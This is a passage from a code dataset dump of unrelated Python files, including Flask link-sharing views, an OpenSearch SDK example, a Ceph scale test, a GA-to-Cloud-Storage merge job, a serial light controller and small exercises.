parse_table.parse_steps:\n for y in x:\n self.test_text.insert('end', y + \" \")\n self.test_text.insert('end', '\\n')\n f = open('action_n_goto_table.txt', 'w')\n f.write(str(parse_table.action_goto_table))\n f.close()\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = Application(master=root)\n app.mainloop()","sub_path":"compiler/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"374114805","text":"# coding=utf-8\nimport time\nimport asyncio\nfrom opensearch import const\nfrom opensearch import Client\nfrom opensearch import IndexDoc\nfrom opensearch import Search\n\n\napp_key = ''\napp_secret = ''\nbase_url = 'http://opensearch-cn-hangzhou.aliyuncs.com'\nindex_name = 'build_test_index_py27'\n\ndoc_id = 1000\ntable_name = 'main'\n\n\nasync def doc_add():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n doc = {}\n doc['id'] = doc_id\n doc['owner_id'] = 1\n doc['catalog_id'] = [12, 34]\n doc['title'] = u\"this is a test title\"\n doc['text'] = u\"this is a test title OpenSearch\"\n doc['updated'] = 1439514278\n doc['created'] = 1439514278\n ret = await indexDoc.add(doc, table_name)\n client.session.close()\n time.sleep(5)\n print('add doc status: ', ret['status'])\n\n\nasync def doc_get():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.get(doc_id, table_name)\n client.session.close()\n print(\"doc title: \", ret['result']['title'])\n\n\nasync def doc_update():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n doc = {\"id\": doc_id, \"title\": \"this is a test title [modify]\", \"text\": \"this is a test title [modify] OpenSearch\"}\n ret = await indexDoc.add(doc, table_name)\n client.session.close()\n time.sleep(5)\n print('update doc status: ', ret['status'])\n\n\nasync def doc_after_update_get():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.get(doc_id, table_name)\n client.session.close()\n print(\"doc title: \", ret['result']['title'])\n\n\nasync def search():\n client = Client(app_key, app_secret, base_url)\n indexSearch = Search(client)\n indexSearch.query = \"default:'opensearch'\"\n indexSearch.addIndex(index_name)\n indexSearch.addSort('updated', const.SEARCH_SORT_DESC)\n indexSearch.fetch_fields = ['id', 'title', 'updated']\n indexSearch.addAggregate('created', 'count()')\n indexSearch.addDistinct('owner_id')\n indexSearch.start = 0\n indexSearch.hits = 50\n ret = await indexSearch.call()\n client.session.close()\n print('search result: ', ret)\n\n\nasync def doc_delete():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.delete(doc_id, table_name)\n client.session.close()\n print('delete doc status: ', ret['status'])\n\n\nasync def run():\n await doc_add()\n await doc_get()\n await doc_update()\n await doc_after_update_get()\n await search()\n await doc_delete()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n","sub_path":"day2/s1/search/src/aliyun-opensearch-python-sdk-master/example/py35_asyncio.py","file_name":"py35_asyncio.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"413304229","text":"# -*- coding: utf-8 
-*-\n\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\n\nfrom waikup.lib import globals as g\nfrom waikup.models import Link, Category, Paginated\nfrom waikup.forms import NewLinkForm, ChangePasswordForm, EditLinkForm, SimpleLinkForm, flash_form_errors\n\nITEMS_PER_PAGE = 10\n\n\nwebui = Blueprint('webui', __name__)\n\n\ndef list_links(page_name, links=None):\n toggle_link_id = request.args.get('toggle')\n page_num = request.args.get('page')\n toggle_form = SimpleLinkForm()\n delete_form = SimpleLinkForm()\n if (page_num is None) or (not page_num.isdigit()):\n page_num = 1\n else:\n page_num = int(page_num)\n if toggle_form.validate_on_submit():\n result_ok = Link.toggle_archiving(toggle_link_id)\n if result_ok:\n flash(\"Toggled archiving for link %s\" % toggle_link_id, category=\"success\")\n else:\n flash(\"Link does not exist: %s\" % toggle_link_id, category=\"danger\")\n else:\n flash_form_errors(toggle_form)\n if links is None:\n links = Link.select().where(Link.archived == (page_name == 'archives')).order_by(Link.submitted.desc())\n links = Paginated(links, page_num, ITEMS_PER_PAGE, links.count())\n return render_template(\n 'links_list.html',\n page_name=page_name,\n links=links,\n toggle_form=toggle_form,\n delete_form=delete_form\n )\n\n\n@webui.route('/', methods=['GET', 'POST'])\n@g.auth.login_required\ndef index():\n return list_links('index')\n\n\n@webui.route('/archives', methods=['GET', 'POST'])\n@g.auth.login_required\ndef archives():\n return list_links('archives')\n\n\n@webui.route('/newlink', methods=['POST'])\n@g.auth.login_required\ndef new_link():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n form = NewLinkForm()\n form.set_category_choices()\n if form.validate_on_submit():\n user = g.auth.get_logged_in_user()\n category = Category.get(Category.name == form.category.data)\n link = Link.create(\n url=form.url.data,\n title=form.title.data,\n description=form.description.data,\n author=user,\n category=category\n )\n flash(\"New link added: %s\" % form.url.data)\n return redirect(redirect_to)\n for field_name, field_errors in form.errors.iteritems():\n for field_error in field_errors:\n flash(\"%s (field: %s)\" % (field_error, field_name), category='danger')\n return redirect(redirect_to)\n\n\n@webui.route('/chpasswd', methods=['POST'])\n@g.auth.login_required\ndef change_password():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n form = ChangePasswordForm()\n if form.validate_on_submit():\n user = g.auth.get_logged_in_user()\n errors = False\n if not user.check_password(form.old.data):\n flash(\"Wrong password\", category='danger')\n return redirect(redirect_to)\n user.set_password(form.new.data)\n user.save()\n flash(\"Password changed\", category='success')\n return redirect(redirect_to)\n for field_name, field_errors in form.errors.iteritems():\n for field_error in field_errors:\n flash(\"%s (field: %s)\" % (field_error, field_name), category='danger')\n return redirect(redirect_to)\n\n\n@webui.route('/delete', methods=['POST'])\n@g.auth.login_required\ndef delete_link():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n linkid = request.args.get('linkid')\n delete_form = SimpleLinkForm()\n if delete_form.validate_on_submit():\n if linkid is None:\n flash(\"No link specified\", category='danger')\n return redirect(redirect_to)\n link = Link.get(Link.id == linkid)\n if link is 
None:\n flash(\"Link not found: %s\" % linkid)\n return redirect(redirect_to)\n user = g.auth.get_logged_in_user()\n if (not user.admin) and (user.username != link.author.username):\n flash(\"You are not allowed to delete this link: %s\" % linkid, category='danger')\n return redirect(redirect_to)\n link.delete_instance()\n flash(\"Deleted link: %s\" % linkid, category='success')\n else:\n flash_form_errors(delete_form)\n return redirect(redirect_to)\n\n\n@webui.route('/email', methods=['GET', 'POST'])\n@g.auth.admin_required\ndef email_mgmt():\n return render_template(\n 'email_mgmt.html',\n page_name='email_mgmt'\n )\n\n\n@webui.route('/genmail')\n@g.auth.admin_required\ndef genmail():\n return render_template('emails/html.jinja2', links=Link.select().where(Link.archived == False))\n\n\n@webui.route('/token')\n@g.auth.login_required\ndef token():\n def generate_token(user):\n new_token = user.generate_token()\n flash('New token generated: %s' % new_token.token, category='success')\n\n def delete_token(user):\n if user.token.count() == 0:\n flash('No token to delete', category='danger')\n return\n user.delete_token()\n flash('Token deleted', category='success')\n\n token_actions = {\n 'generate': generate_token,\n 'delete': delete_token\n }\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.' + redirect_to)\n action = request.args.get('action')\n if action is None:\n flash('No action specified', category='danger')\n return redirect(redirect_to)\n if action not in token_actions:\n flash('Unknown action: %s' % action, category='danger')\n return redirect(redirect_to)\n current_user = g.auth.get_logged_in_user()\n token_actions[action](current_user)\n return redirect(redirect_to)\n\n\n@webui.route('/stats')\n@g.auth.login_required\ndef stats():\n return render_template(\n 'stats.html',\n page_name=\"stats\"\n )\n\n\n@webui.route('/search', methods=['GET'])\n@g.auth.login_required\ndef search():\n redirect_page = request.args.get('page', 'index')\n page_num = request.args.get('page')\n if (page_num is None) or (not page_num.isdigit()):\n page_num = 1\n else:\n page_num = int(page_num)\n redirect_to = url_for('webui.' 
+ redirect_page)\n # pattern = request.form.get('pattern')\n pattern = request.args.get('pattern')\n if pattern is None:\n flash(\"No pattern given\", category='danger')\n return list_links(redirect_page)\n archived = redirect_page == 'archives'\n pattern = \"%%%s%%\" % pattern\n links = Link.select().where(Link.archived == archived).where(\n (Link.title ** pattern) | (Link.description ** pattern)\n )\n links = Paginated(links, page_num, ITEMS_PER_PAGE, links.count())\n return render_template(\n 'links_list.html',\n page_name=redirect_page,\n links=links,\n toggle_form=SimpleLinkForm(),\n delete_form=SimpleLinkForm()\n )\n\n\n@webui.route('/edit_link/', methods=['GET', 'POST'])\n@g.auth.login_required\ndef edit_link(linkid):\n form = EditLinkForm()\n form.set_category_choices()\n link = Link.get(Link.id == linkid)\n redirect_page = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_page)\n if link is None:\n flash(\"Link not found: %d\" % linkid, category='danger')\n return redirect(redirect_to)\n if request.method == 'POST':\n user = g.auth.get_logged_in_user()\n if (not user.admin) and (user.username != link.author.username):\n flash(\"You are not allowed to edit this link: %d\" % link.id, category='danger')\n return redirect(redirect_to)\n if form.validate_on_submit():\n link.title = form.title.data\n link.url = form.url.data\n link.description = form.description.data\n category = Category.get(Category.name == form.category.data)\n link.category = category\n link.save()\n flash(\"Updated link: %d\" % link.id)\n else:\n flash_form_errors(form)\n return redirect(redirect_to)\n form.title.data = link.title\n form.url.data = link.url\n form.description.data = link.description\n form.category.data = link.category.name\n return render_template(\n 'edit_link_modal_content.html',\n edit_link_form=form,\n link=link,\n page_name=redirect_page\n )\n","sub_path":"waikup/views/webui.py","file_name":"webui.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"44306930","text":"\nprint(\"DESAFIOS DE NÍVEL 1 - PHYTON 3\")\n\n\ndef divisores():\n print(\"Desafio 1: divisores de 7 que nao são por 5\")\n\n numeros_desafio = []\n for n in range(200, 3201):\n if (n%7==0) and (n%5!=0):\n numeros_desafio.append(n)\n\n print(\"RESPOSTA DESAFIO 1:\", numeros_desafio)\n\n\n\n\n\n#Desafio 2: fatore qualquer número#\nprint(\"Desafio 2: Fatoração\")\ndef fat():\n n = input(\"Digite um número:\")\n n = int(n)\n\n if ( n == 0):\n print(\"Fatoração = 0\")\n elif(n==1):\n print(\"Fatoração = 1\")\n else :\n theFactors = []\n for i in range(2,n+1):\n while n % i == 0:\n n = n/i\n print(i)\n theFactors.append(i)\n i = int(i)\n sobrou = print(\"Sobrou\", n)\n print(\"RESPOSTA DESAFIO 2:\", theFactors)\n\n\n#Desafio 3\n\ndef append_list():\n numero_digitado = int(input(\"Digite aqui um número:\"))\n\n x = []\n\n for numero_ql in range(1, numero_digitado + 1):\n x.append(numero_ql)\n y = numero_ql * numero_ql\n x.append(y)\n print(x)\n\n #Questão 4\n\n\nprint(\"Questão 4:\")\n\ndef substituicao_lista():\n j = [14, 15, 17]\n\n t = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n t[3:10] = []\n print(t)\n\n j = str(j)\n\n y = j.strip(\"a\")\n\n print(y)\n\ndef calculo_salario ():\n salario_hora = int(input(\"Quanto você ganha por hora?\"))\n horas_trabalhadas = int(input(\"Quantas horas trabalha no mês?\"))\n\n salario_bruto = salario_hora * horas_trabalhadas\n percent_ir = 0.11 * salario_bruto\n percent_inss = 0.08 * 
salario_bruto\n percent_sindicato = 0.05 * salario_bruto\n\n salario_liquido = int(salario_bruto - percent_ir - percent_inss - percent_sindicato)\n\n print(\"Seu salário descontando os impostos é de:\", salario_liquido)\n\n\n\n","sub_path":"multiplos.py","file_name":"multiplos.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462343311","text":"# 2c\n# Jacob Soto Vilchez\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nt=np.linspace(0,4*math.pi,100)\nf=np.sin(3*t)*np.cos(2*t)\nplt.plot(t,f,linewidth=2,color='green')\n#Grafico 2\ng=(1/2*np.cos(t))+(5/2*np.cos(5*t))\nplt.plot(t,g,linewidth=2,color='orange')\nplt.legend('fg')\nplt.grid(True)\nplt.title('Funciones trigonometricas')\nplt.xlabel('x')\nplt.ylabel('f(t),g(t)')\nplt.savefig('graf2c.png')\nplt.show()\n","sub_path":"Laboratorios JACOB/LABORATORIO 3B/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523882392","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Simon Liu\"\n\nimport time\nimport threading\n\n\ndef get_detail_html(url):\n print(\"get detail html started\")\n time.sleep(2)\n print(\"get detail html end\")\n\n\ndef get_detail_url(url):\n print(\"get detail url started\")\n time.sleep(4)\n print(\"get detail url end\")\n\n\nif __name__ == \"__main__\": # 函数方法 arg 为函数参数\n thread1 = threading.Thread(target=get_detail_html, args=(\"\",))\n thread2 = threading.Thread(target=get_detail_url, args=(\"\",))\n\n thread1.setDaemon(True)\n # thread2.setDaemon(True) # 将两个线程设置为守护线程,即主线程退出,这两个子线程也退出,kill\n\n start_time = time.time() # 子程开始\n thread1.start()\n thread2.start() # 当主线程退出的时候, 子线程kill掉\n\n # thread1.join()\n print (\"last time: {}\".format(time.time()-start_time)) # 输出get detail html started\n","sub_path":"JSON_RPC/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"428834179","text":"\"\"\"\nScale TC to perform PVC Scale and Respin of Ceph pods in parallel\n\"\"\"\nimport logging\nimport pytest\nimport threading\n\nfrom ocs_ci.helpers import helpers, disruption_helpers\nfrom ocs_ci.ocs import constants\nfrom ocs_ci.ocs.resources import pod\nfrom ocs_ci.utility import utils\nfrom ocs_ci.framework.testlib import scale, E2ETest, ignore_leftovers\nfrom ocs_ci.framework.pytest_customization.marks import skipif_external_mode\n\nlog = logging.getLogger(__name__)\n\n\nclass BasePvcCreateRespinCephPods(E2ETest):\n \"\"\"\n Base Class to create POD with PVC and respin ceph Pods\n \"\"\"\n\n def create_pvc_pod(self, rbd_sc_obj, cephfs_sc_obj, number_of_pvc, size):\n \"\"\"\n Function to create multiple PVC of different type and bind mount them to pods\n\n Args:\n rbd_sc_obj (obj_dict): rbd storageclass object\n cephfs_sc_obj (obj_dict): cephfs storageclass object\n number_of_pvc (int): pvc count to be created for each types\n size (str): size of each pvc to be created eg: '10Gi'\n \"\"\"\n log.info(f\"Create {number_of_pvc} pvcs and pods\")\n cephfs_pvcs = helpers.create_multiple_pvc_parallel(\n cephfs_sc_obj,\n self.namespace,\n number_of_pvc,\n size,\n access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],\n )\n rbd_pvcs = helpers.create_multiple_pvc_parallel(\n rbd_sc_obj,\n self.namespace,\n number_of_pvc,\n size,\n 
access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],\n )\n # Appending all the pvc obj to base case param for cleanup and evaluation\n self.all_pvc_obj.extend(cephfs_pvcs + rbd_pvcs)\n\n # Create pods with above pvc list\n cephfs_pods = helpers.create_pods_parallel(\n cephfs_pvcs, self.namespace, constants.CEPHFS_INTERFACE\n )\n rbd_rwo_pvc, rbd_rwx_pvc = ([] for i in range(2))\n for pvc_obj in rbd_pvcs:\n if pvc_obj is not None:\n if type(pvc_obj) is list:\n for pvc_ in pvc_obj:\n if pvc_.get_pvc_access_mode == constants.ACCESS_MODE_RWX:\n rbd_rwx_pvc.append(pvc_)\n else:\n rbd_rwo_pvc.append(pvc_)\n else:\n if pvc_obj.get_pvc_access_mode == constants.ACCESS_MODE_RWX:\n rbd_rwx_pvc.append(pvc_obj)\n else:\n rbd_rwo_pvc.append(pvc_obj)\n\n rbd_rwo_pods = helpers.create_pods_parallel(\n rbd_rwo_pvc, self.namespace, constants.CEPHBLOCKPOOL\n )\n rbd_rwx_pods = helpers.create_pods_parallel(\n rbd_rwx_pvc, self.namespace, constants.CEPHBLOCKPOOL, raw_block_pv=True\n )\n temp_pod_objs = list()\n temp_pod_objs.extend(cephfs_pods + rbd_rwo_pods)\n # Appending all the pod obj to base class param for cleanup and evaluation\n self.all_pod_obj.extend(temp_pod_objs + rbd_rwx_pods)\n\n # Start respective IO on all the created PODs\n threads = list()\n for pod_obj in temp_pod_objs:\n process = threading.Thread(\n target=pod_obj.run_io,\n args=(\n \"fs\",\n \"512M\",\n ),\n )\n process.start()\n threads.append(process)\n for pod_obj in rbd_rwx_pods:\n process = threading.Thread(\n target=pod_obj.run_io,\n args=(\n \"block\",\n \"512M\",\n ),\n )\n process.start()\n threads.append(process)\n for process in threads:\n process.join()\n\n def respin_ceph_pod(self, resource_to_delete):\n \"\"\"\n Function to respin ceph pods one by one,\n delete_resource functions checks for the deleted pod back up and running\n\n Args:\n resource_to_delete (str): Ceph resource type to be deleted.\n eg: mgr/mon/osd/mds/cephfsplugin/rbdplugin/cephfsplugin_provisioner/rbdplugin_provisioner\n \"\"\"\n disruption = disruption_helpers.Disruptions()\n disruption.set_resource(resource=resource_to_delete)\n no_of_resource = disruption.resource_count\n for i in range(0, no_of_resource):\n disruption.delete_resource(resource_id=i)\n # Validate storage pods are running\n assert pod.wait_for_storage_pods(), \"ODF Pods are not in good shape\"\n # Validate cluster health ok and all pods are running\n assert utils.ceph_health_check(\n delay=180\n ), \"Ceph health in bad state after node reboots\"\n\n def cleanup(self):\n \"\"\"\n Function to cleanup the SC, PVC and POD objects parallel.\n \"\"\"\n helpers.delete_objs_parallel(pod.get_all_pods(namespace=self.namespace))\n helpers.delete_objs_parallel(self.all_pvc_obj)\n self.rbd_sc_obj.delete()\n self.cephfs_sc_obj.delete()\n\n\n@scale\n@ignore_leftovers\n@skipif_external_mode\n@pytest.mark.parametrize(\n argnames=\"resource_to_delete\",\n argvalues=[\n pytest.param(\n *[\"mgr\"],\n marks=[\n pytest.mark.polarion_id(\"OCS-766\"),\n pytest.mark.skip(reason=\"Skipped due to bz 2130867\"),\n ],\n ),\n pytest.param(*[\"mon\"], marks=[pytest.mark.polarion_id(\"OCS-764\")]),\n pytest.param(*[\"osd\"], marks=[pytest.mark.polarion_id(\"OCS-765\")]),\n pytest.param(*[\"mds\"], marks=[pytest.mark.polarion_id(\"OCS-613\")]),\n pytest.param(\n *[\"cephfsplugin_provisioner\"], marks=[pytest.mark.polarion_id(\"OCS-2641\")]\n ),\n pytest.param(\n *[\"rbdplugin_provisioner\"], marks=[pytest.mark.polarion_id(\"OCS-2639\")]\n ),\n pytest.param(*[\"rbdplugin\"], 
marks=[pytest.mark.polarion_id(\"OCS-2643\")]),\n pytest.param(*[\"cephfsplugin\"], marks=[pytest.mark.polarion_id(\"OCS-2642\")]),\n ],\n)\nclass TestPVSTOcsCreatePVCsAndRespinCephPods(BasePvcCreateRespinCephPods):\n \"\"\"\n Class for PV scale Create Cluster with 1000 PVC, then Respin ceph pods parallel\n \"\"\"\n\n @pytest.fixture()\n def setup_fixture(self, request):\n def finalizer():\n self.cleanup()\n\n request.addfinalizer(finalizer)\n\n @pytest.fixture()\n def namespace(self, project_factory):\n \"\"\"\n Create a project for the test\n \"\"\"\n proj_obj = project_factory()\n self.namespace = proj_obj.namespace\n\n @pytest.fixture()\n def storageclass(self, storageclass_factory):\n \"\"\"\n Create Storage class for rbd and cephfs\n \"\"\"\n self.rbd_sc_obj = storageclass_factory(interface=constants.CEPHBLOCKPOOL)\n self.cephfs_sc_obj = storageclass_factory(interface=constants.CEPHFILESYSTEM)\n\n def test_pv_scale_out_create_pvcs_and_respin_ceph_pods(\n self,\n namespace,\n storageclass,\n setup_fixture,\n resource_to_delete,\n ):\n pvc_count_each_itr = 10\n scale_pod_count = 120\n size = \"10Gi\"\n self.all_pvc_obj, self.all_pod_obj = ([] for i in range(2))\n\n # First Iteration call to create PVC and POD\n self.create_pvc_pod(\n self.rbd_sc_obj, self.cephfs_sc_obj, pvc_count_each_itr, size\n )\n # Re-spin the ceph pods one by one in parallel with PVC and POD creation\n while True:\n if scale_pod_count <= len(self.all_pod_obj):\n log.info(f\"Create {scale_pod_count} pvc and pods\")\n break\n else:\n thread1 = threading.Thread(\n target=self.respin_ceph_pod, args=(resource_to_delete,)\n )\n thread2 = threading.Thread(\n target=self.create_pvc_pod,\n args=(\n self.rbd_sc_obj,\n self.cephfs_sc_obj,\n pvc_count_each_itr,\n size,\n ),\n )\n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join()\n\n assert utils.ceph_health_check(\n delay=180\n ), \"Ceph health in bad state after pod respins\"\n","sub_path":"tests/e2e/scale/test_pv_scale_and_respin_ceph_pods.py","file_name":"test_pv_scale_and_respin_ceph_pods.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452607030","text":"import click\nimport sqlite3\nimport pandas as pd\nimport conf\nfrom libs.utils import divide_list\nfrom flask.cli import with_appcontext\nimport os\nfrom google.cloud import storage\n\n\ndef get_table_data_as_dataframe(date, table_category_name):\n db_name = conf.SQLITE_DATABASE_NAME\n conn = sqlite3.connect(db_name)\n table_name = conf.TABLE_PREFIX + date.replace(\"-\", \"\") + \"_\" + table_category_name\n try:\n # rdbのデータをpandasのDataFrame型で読み込む\n df = pd.read_sql(\"select * from \" + table_name, conn)\n except:\n df = get_empty_dataframe()\n return df\n\n\ndef get_empty_dataframe():\n pk_keys = [k.get(\"name\").replace(\"ga:\", \"\") for k in conf.PK_DIMENSIONS]\n df = pd.DataFrame(columns=pk_keys)\n return df\n\n\n@click.command('merge_data_to_gcs', help=\"Merge database data and upload Google Cloud Storage\")\n@click.argument('date')\n@click.argument('bucket_name')\n@click.argument('file_dir_name')\n@with_appcontext\ndef merge_data_to_gcs(date, bucket_name, file_dir_name):\n print(\"Merge data start [date]\", date.replace(\"-\", \"\"))\n\n df = get_empty_dataframe()\n for k, v in conf.DIMENSIONS_METRICS_COMBINATIONS.items():\n dimensions = v.get(\"dimensions\")\n divide_num = (len(dimensions) // (8 - len(conf.PK_DIMENSIONS))) + 1\n sublist = divide_list(dimensions, divide_num)\n for i, elem in 
enumerate(sublist):\n df = pd.merge(df, get_table_data_as_dataframe(date, k + \"_\" + str(i + 1)), how='outer')\n\n for k, v in conf.MERGE_DATA_FRAME_APPLY_SETTINGS.items():\n try:\n df[v.get(\"key_after_convert\")] = df[k].apply(v.get(\"apply_func\"))\n except KeyError as e:\n if v.get(\"raise_error\"):\n raise e\n\n temp_file_name = 'temp.json'\n df.to_json(temp_file_name,\n orient=\"records\",\n lines=True)\n file_name = conf.CSV_PREFIX + date.replace(\"-\", \"\") + \".json\"\n client = storage.Client()\n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(file_dir_name + file_name)\n blob.upload_from_filename(filename=temp_file_name)\n if os.path.exists(temp_file_name): os.remove(temp_file_name)\n","sub_path":"jobs/merge_data_to_gcs.py","file_name":"merge_data_to_gcs.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"350419667","text":"from time import sleep\nimport serial\nimport json\n\nclass LightController:\n def __init__(self):\n self.lightmap = dict()\n self.stripmap = dict()\n self.commandmap = dict()\n\n # Reads local files for serial command mapping\n self._getLightMap()\n self._getStripMap()\n self._getCommandMap()\n\n # Load saved light states\n self._getState()\n self.loadFromState()\n\n self.ser = serial.Serial()\n self.ser.baudrate = 9600\n self.ser.port = '/dev/ttyACM0'\n try:\n self.ser.open()\n except:\n print('Failed to open serial port')\n\n\n def fadeStrip(self,strip):\n for i in range (256):\n hexString = \"\"\n hexString += self.commandmap['color']\n hexString += self.lightmap[strip]\n\n levelCommand = bytearray.fromhex(hexString)\n level = i.to_bytes(1, byteorder='big')\n\n levelCommand.join(level)\n levelCommand.join(level)\n levelCommand.join(level)\n self.ser.write(levelCommand)\n sleep(.05)\n\n\n def setLightState(self, light, state):\n # Update the state\n if light in self.lightmap:\n if state:\n self.state['lights'][light] = 1\n else:\n self.state['lights'][light] = 0\n self._saveState()\n\n # Build serial command from arguments\n hexString = \"\"\n if(state):\n hexString += self.commandmap['on']\n else:\n hexString += self.commandmap['off']\n hexString += self.lightmap[light]\n\n # Cast hex to bytes and send command\n command = bytearray.fromhex(hexString)\n print(\"Writing \" + str(state) + \" to \" + str(light))\n try:\n self.ser.write(command)\n except:\n print('Write failed. Serial port isn\\'t open')\n\n\n def setStripColor(self, strip, color):\n # Update the state\n if(strip in self.lightmap):\n self.state['strips'][strip] = color\n self._saveState()\n\n # Build serial command from arguments\n hexString = \"\"\n hexString += self.commandmap['color']\n hexString += self.stripmap[strip]\n hexString += color.strip('# \\t\\n')\n\n # Cast hex to bytes and send command\n command = bytearray.fromhex(hexString)\n print(\"Writing \" + str(color) + \" to \" + str(strip))\n try:\n self.ser.write(command)\n except:\n print('Write failed. 
Serial port isn\\'t open')\n\n\n def loadFromState(self):\n # Load strip colors\n for strip, color in self.state['strips'].items():\n self.setStripColor(strip,color)\n\n # Load light states\n for light, state in self.state['lights'].items():\n self.setLightState(light,state)\n\n # Returns the dict of the current light states\n def getState(self):\n return self.state\n\n def _getStripMap(self):\n f = open('stripmap.txt','r')\n for line in f:\n name, number = line.strip().split(':')\n self.stripmap[name] = number\n\n def _getLightMap(self):\n f = open('lightmap.txt', 'r')\n for line in f:\n name, number = line.strip().split(':')\n self.lightmap[name] = number\n\n print(self.lightmap)\n\n\n def _getCommandMap(self):\n f = open('commandMapping.txt', 'r')\n for line in f:\n command, number = line.strip().split(':')\n self.commandmap[command] = number\n\n def _saveState(self):\n try:\n f = open('state.json','w')\n json.dump(self.state, f, sort_keys=True, indent=4)\n except:\n print('Error writing state')\n\n def _getState(self):\n # Load state saved light state\n self.state = dict()\n self.state['lights'] = dict()\n self.state['strips'] = dict()\n try:\n fp = open('state.json', 'r')\n self.state = json.load(fp)\n except:\n print('State file not found, loading defaults')\n try:\n fp = open('default.json', 'r')\n self.state = json.load(fp)\n except:\n print('Default state not found, arduino defaults will be loaded')\n","sub_path":"lightController.py","file_name":"lightController.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52695754","text":"vector = ((0, 1), (0, -1), (1, 0), (-1, 0))\n\n\ndef dfs(y, x, num, depth):\n if depth == 7:\n numbers.add(num)\n return\n\n for v in vector:\n ty, tx = y + v[0], x + v[1]\n if 0 <= ty < 4 and 0 <= tx < 4:\n dfs(ty, tx, num + grid[ty][tx], depth + 1)\n\n\ndef solve():\n for pos in range(0, 16):\n y, x = (pos // 4, pos % 4)\n dfs(y, x, \"\", 0)\n return len(numbers)\n\n\nfor testNo in range(1, int(input()) + 1):\n grid = []\n numbers = set()\n\n for _ in range(4):\n grid.append(input().split())\n print(f'#{testNo} {solve()}')\n","sub_path":"풀이/swea/recommends/2819_o.py","file_name":"2819_o.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203967571","text":"# encoding:utf-8\n# @Time : 2019/3/19 17:37\n# @Author : Jerry Chou\n# @File : main_v10.0.py\n# @Function : 1.法力水晶从1开始每轮+1直到10\n# 2.每轮敌我双方交替出牌,出的卡牌水晶总数不能超过本轮水晶数\n# 3.上场的卡牌随机攻击对方场上卡牌,如果对方场上没有卡牌,则攻击对方英雄\n# 4.一方英雄死亡,游戏结束\n# 5.增加疲劳机制:抽完卡牌,每个回合扣血,扣血量每个回合+1\n# 6.如果敌方场上卡牌>1,手动选择攻击的卡牌\n# 7.我方回合选择上场的卡牌\n# 8.增加战士英雄技能,先选择卡牌是否上场,后选择是否使用英雄技能\n# 9.敌方有卡牌在场时,我方卡牌先选择是否攻击敌方英雄,如果不攻击敌方英雄则选择攻击敌方在场卡牌(>1)\n# 使用英雄技能和卡牌上场由用户选择,每个回合只能用一次英雄技能\n# 优化循环判断层次比较多的代码\n\nfrom generate_cards import generate_cards\nfrom fight import *\nfrom random import randint\n\nCARD_NUM = 10\nINIT_HAND_COUNT = 3\nHERO_HEALTH = 30\n\n\nclass Hero:\n def __init__(self, hero_class, hero_name):\n self.health = 30\n self.hero_class = hero_class\n self.hero_name = hero_name\n self.use_power = False\n\n def health_change(self, change):\n self.health += change\n\n\nclass world:\n def __init__(self):\n self.mana = 1\n self.myworldcards = []\n self.enemyworldcards = []\n # self.myherohealth = HERO_HEALTH\n self.myhero = Hero('warrior', '加尔鲁什·地狱咆哮')\n # self.enemyherohealth = HERO_HEALTH\n self.enemyhero = Hero('warrior', '加尔鲁什·地狱咆哮')\n self.init_hand_count = 
